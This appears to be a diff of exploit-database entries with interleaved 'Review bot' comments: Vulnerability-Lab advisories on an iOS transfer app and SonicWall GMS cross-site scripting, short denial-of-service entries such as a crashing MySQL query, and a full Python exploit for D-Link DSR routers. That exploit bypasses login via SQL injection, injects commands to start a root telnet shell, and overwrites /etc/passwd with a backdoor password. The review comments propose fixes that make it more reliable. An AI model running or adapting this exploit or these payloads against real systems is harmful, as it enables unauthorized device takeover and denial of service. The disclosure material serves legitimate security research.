The security risk of the file include and arbitrary file upload (restricted upload bypass) web vulnerability is estimated as critical.
1.2
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
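Review bot: The header gives a single CVSS of 8.9 and severity "Critical", while section 1.2 rates the command/path inject at 6.2/6.3 and "high(-)"; the header should say it reflects issue 1.1 only, or list both scores. The PoC sections are captured response HTML rather than the POST requests that the "Vulnerable Parameter(s)" list names (filename, foldername, devicename), so reproduction depends entirely on the prose; including the request bodies, or at least the form fields involved, would make the fix in the Solution section verifiable. Minor: "Copyright ?" in the footer is a mis-encoded character.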

View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
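Review bot: the "Vulnerability Disclosure Timeline" entry in this advisory reads `2012-11-30: Public Disclosure`, a year before the `Release Date: 2013-12-04` given a few lines above it; the year looks like a typo and should agree with the release date. Two further consistency points in the same file: "Exploitation Technique" says `Remote`, but the technical details state that exploitation "requires a local low privileged iOS device account" and the PoC steps create the album in the device's own Photo app, so the field should say Local (or the text should describe the remote vector). Also, what the PoC HTML actually shows is the album name rendered unescaped into the app's embedded web page (`<div class="phga_hd_left">Album : ">%20<x src=...` and the `<dd>` entry in the index list), i.e. stored markup injection into the transfer UI; nothing on the page shows a system command or file path being executed, so the "command/path inject" classification overstates the finding. The fix section already gives the right remediation (encode the album name on output in both the index list and the sub category list); naming it as HTML entity encoding of the value would make it concrete.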



@ -0,0 +1,303 @@
#!/usr/bin/python
#
# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on: D-Link DWC-1000
#
# Download URL: http://tsd.dlink.com.tw
#
# Arch: mips and armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2013-08-18
#
# Purpose: Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites: Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12: Informed Heise Security and asked for their support on this case
# 2013-09-13: Informed the manufacturer D-Link via
# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!)
# http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
# mail@dlink.ru (contact request sent)
# info@dlink.ee (contact request sent)
# info@dlink.de (contact request sent)
# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de
# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17: German BSI responds, contact established.
# 2013-09-24: Requested CVE-IDs.
# 2013-09-25: Heise responds, contact established.
# 2013-09-27: D-Link asks for details on vulns and the exploit code.
# Mitre assigns two CVEs:
# CVE-2013-5945 -- authentication bypass
# CVE-2013-5946 -- privilege escalation
# 2013-09-30: D-Link has received the exploit and documentation via BSI
# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03: Public Disclosure
#
# And now - the fun part :-)
#
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
#
##############################
cookie = ""
pid = -2
bduser = ""
def request(m = "", u = "", b = "", h = ""):
global ipaddr
conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
assert m in ["GET", "POST"]
conn.request(method = m, url = u, body = b, headers = h)
ret = conn.getresponse()
header = ret.getheaders()
data = ret.read()
conn.close()
return (header, data)
def login(user, passwd):
global ipaddr
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "index.htm",
'Users.UserName' : user,
'Users.Password' : passwd,
'button.login.Users.deviceStatus' : "Login",
'Login.userAgent' : "Exploit"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def logout():
global ipaddr, cookie
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = ""
return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
def execCmd(cmd = None):
global ipaddr, cookie
assert cmd != None
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
'Cookie': cookie,
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "systemCheck.htm",
'ping.ip' : "localhost;" + cmd,
'button.traceroute.diagDisplay' : "Traceroute"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def findPid(mystr = None):
# " 957 root 2700 S /usr/sbin/telnetd -l /bin/login"
assert mystr != None
mypid = 0
(h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
s = d.find(mystr)
if s > 0:
# telnetd is running
cand = d[s - 50 : s]
try:
mypid = int(cand.split("\n")[1].split()[0])
except IndexError:
mypid = int(cand.split(">")[1].split()[0])
return mypid
def restartTelnetd(mystr1 = None, mystr2 = None):
assert mystr1 != None and mystr2 != None
global pid
pid = findPid("telnetd -l /bin/")
if pid > 0:
# Stopping the running telnetd
print "[+] Stopping telnetd (" + str(pid) + "): ",
sys.stdout.flush()
(h, d) = execCmd("kill " + str(pid))
pid = findPid(mystr1)
if pid > 0:
print "FAILURE"
sys.exit(-1)
else:
print "OK"
# Starting a new telnetd
print "[+] Starting telnetd: ",
sys.stdout.flush()
(h, d) = execCmd("telnetd -l " + mystr2)
pid = findPid("telnetd -l " + mystr2)
if pid > 0:
print "OK (" + str(pid) + ")"
else:
print "FAILURE"
sys.exit(-1)
def main():
global ipaddr, cookie, pid, bduser, bdpasswd
user = "admin"
passwd = "' or 'a'='a"
print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
print "This change is non-persistent to device reboots."
print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
# Logging into the router
print "[+] Trying to log into the router: ",
sys.stdout.flush()
(h, d) = login(user, passwd)
if d.find("User already logged in") > 0:
print "FAILURE"
print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
sys.exit(-1)
elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
while h:
(c1, c2) = h.pop()
if c1 == 'set-cookie':
cookie = c2
break
print "OK (" + cookie + ")"
elif d.find("Invalid username or password") > 0:
print "FAILURE"
print "[-] Invalid username or password"
sys.exit(-1)
else:
print "FAILURE"
print "[-] Unable to login."
sys.exit(-1)
# Starting a telnetd with custom parameters
print "[+] Preparing the hack..."
restartTelnetd("/bin/login", "/bin/sh")
# Do the h4cK
print "[+] Hacking the router..."
print "[+] Getting the backdoor user name: ",
sys.stdout.flush()
tn = telnetlib.Telnet(ipaddr.split(":")[0])
tn.read_very_eager()
tn.write("cat /etc/profile\n")
time.sleep(5)
data = tn.read_very_eager()
for i in data.split("\n"):
if i.find('"$USER"') > 0:
bduser = i.split('"')[3]
break
if len(bduser) > 0:
print "OK (" + bduser + ")"
else:
print "FAILURE"
sys.exit(-1)
print "[+] Setting the new password for " + bduser + ": ",
sys.stdout.flush()
tn.write("cat /etc/passwd\n")
time.sleep(5)
data = tn.read_very_eager()
data = data.split("\n")
data.reverse()
data.pop()
data.reverse()
data.pop()
data = "\n".join(data)
for i in data.split("\n"):
if i.find(bduser) >= 0:
line = i.split(':')
s1 = string.lowercase + string.uppercase + string.digits
salt = ''.join(random.sample(s1,2))
pw = crypt.crypt(bdpasswd, salt)
line[1] = pw
# doesn't work for some odd reason -- too lazy to find out why
#salt = ''.join(random.sample(s1,8))
#line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
data = data.replace(i, ":".join(line))
break
tn.write('echo -en "" > /etc/passwd\n')
time.sleep(5)
for i in data.split("\n"):
tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
time.sleep(1)
data = tn.read_very_eager()
tn.close()
if data.find(pw) >= 0:
print "OK (" + pw + ")"
success = True
else:
print "FAILURE"
print "[-] Could not set the new password."
sys.exit(-1)
# Switching back to the originals
print "[+] Mobbing up..."
restartTelnetd("/bin/sh", "/bin/login")
# Logging out
print "[+] Logging out: ",
sys.stdout.flush()
(h, d) = logout()
if d.find('value="Login"') > 0:
print "OK"
else:
print "FAILURE"
print "[-] Unable to determine if user is logged out."
# Print success message
if success:
print "[+] You can now log in via SSH and Telnet by using:"
print " user: " + bduser
print " pass: " + bdpasswd
print " These changes will be reverted upon router reboot."
print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent."
main()
sys.exit(0)
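Review bot: `logout()` never sends the session cookie, so the final GET to `/scgi-bin/platform.cgi?page=index.htm` in `main()` cannot end the session the script opened: the `headers` dict in `logout()` has no `'Cookie': cookie` entry (compare `execCmd()`, which does set it), and the success check `d.find('value="Login"') > 0` passes trivially because an unauthenticated request returns the login page anyway. Add the cookie header and the check becomes meaningful; the script itself notes that a still-logged-in `admin` session blocks a later run. A second problem is in the `/etc/passwd` rewrite: `pw` is only bound inside the `for i in data.split("\n")` loop when a line containing `bduser` is found, so if no such line exists the later `data.find(pw)` raises `NameError` instead of printing the intended "Could not set the new password" message; initialise `pw = None` before the loop and fail cleanly. Minor: `findPid()` parses the PID from `d[s - 50 : s]`, which assumes the `ps` line layout shown in the comment and is brittle across firmware builds, and the status message `"[+] Mobbing up..."` should read "Mopping up...".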

234
platforms/jsp/webapps/30054.txt Executable file

@ -0,0 +1,234 @@
Document Title:
===============
Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1099
Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1099
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-27: Vendor Notification (DELL SonicWall Security Team)
2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team)
2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team)
2013-12-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: GMS Networks Appliance Application 7.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application.
The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent).
The persistent vulnerability is located in the `valfield_1` & `value_1` value parameters of the `Alert Settings` module POST method request.
Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp
appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert
settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values.
To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself
disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter & exception-handling.
The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system)
count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL).
The hotfix and information has been provided in cooperation with the vulnerability-laboratory.
Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent manipulation of vulnerable module context.
Vulnerable Application(s):
[+] DELL - SonicWall GMS v7.1.x Appliance Application
Vulnerable Module(s):
[+] Alert Settings > NewThreshold
Vulnerable File(s):
[+] createNewThreshold.jsp > ematStaticAlertTypes.jsp
Vulnerable Parameter(s):
[+] valfield_1
[+] value_1
Affected Module(s):
[+] createNewThreshold
[+] ematStaticAlertTypes
[+] Alert Settings - Main Listing
Affected Product(s):
[+] Dell SonicWALL GMS
[+] Dell SonicWALL Analyzer
[+] Dell SonicWALL UMA E5000
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged or restricted guest accounts and
low user interaction. For security demonstration or reproduce the vulnerability follow the information and steps below.
Location: Alert Settings
http://gms.localhost:8080/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Inject via Add: Edit contents for alert type: Backed-Up Syslog Files
http://gms.localhost:8080/sgms/ematStaticAlertTypes.jsp?
Execute: Create New Threshold
http://gms.localhost:8080/sgms/createNewThreshold.jsp?
Affected:
http://gms.localhost:8080/sgms/auth
Manual steps to reproduce ...
1. Open the Sonicwall GMS appliance application and login with full restrictions as guest
2. Switch to the vulnerable Console > Events > Alert Settings section
3. Click Add Alert and a new blank window of the application will be opened
4. Click in the upcomings window in the Alert Types section the Edit Content link
5. Now, a new window opens "Edit contents for alert type: Backup Sys-Log Files
6. On top is a little plus button next to the Threshold value
9. A new window opens with Elements box ... Inject your payload (script code) to the description eval in the operator fields
10. After the inject to the input fields the attacker only needs to click the Add Element button on the buttom of the page
11. The code will be directly executed and is persistent saved as element in the specific section
12. Save the input via update and go back to the alert settings main section were the code execute occurs in the same connected value
13. Successful reproduced!
PoC: Alert Settings - Create New Threshold
Critical</option></select> </td><td class="tblData2" width="1">
<img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td class="tblData2" align="center"
nowrap="nowrap"><input class="controlFont" name="disabled" value="1" type="checkbox"></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td>
<td class="tblData2" align="center" nowrap="nowrap"><a href="#" onclick="deleteElement(1);">
<img src="Create%20New%20Threshold_files/trash.gif" alt="Delete this destination" border="0"></a></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td></tr><tr><td></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td colspan="5"
class="tblData2" align="left" nowrap="nowrap"> <font class="controlfont">Description: </font>
<input class="controlfont" size="64" name="description"
value="is equal to >" <[PERSISTENT INJECTED SCRIPT CODE!]" type="text"> >"<[PERSISTENT INJECTED SCRIPT CODE!]">"
onkeyup="enableAutoDesc(1,0);"></td><td class="tblData2"
width=1><img src="images/1x1trans.gif"></td>
Note: Please, feel free to read also the patch information provided in the solution section of the advisory document.
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse, prevention filter mechanism or clean encode of the vulnerable value_1 and valfield_1 parameters.
Also restrict and escape the affected input field and output listing in the connected modules.
Resolution (DELL SonicWall):
We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability with filter bypass is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
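Review bot: the numbered reproduction steps in the PoC section jump from 6 straight to 9, so either steps 7 and 8 were dropped or the numbering is off, and step 5's window title ("Edit contents for alert type: Backup Sys-Log Files) is missing its closing quote and does not match the "Backed-Up Syslog Files" label quoted in the "Inject via Add" line above it. Renumber the steps and use one consistent alert-type name so a reader can follow the procedure against the listed URLs.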

platforms/linux/dos/30020.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23911/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
Versions prior to MySQL 5.0.40 are vulnerable.
SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)));

platforms/linux/dos/30024.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23927/info
The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows.
Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of an application using the vulnerable library. Failed attempts will likely result in denial-of-service conditions.
Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg

platforms/linux/dos/30044.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip
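Review bot: the sploits link at the end of 30044.txt points at 30043.zip although this entry is 30044; confirm whether the archive really belongs to entry 30043 or whether the link should read 30044.zip before this file is published, otherwise the PoC reference for this Sun JDK entry is unreachable or points at the wrong material.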

platforms/linux/dos/30080.c Executable file
@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
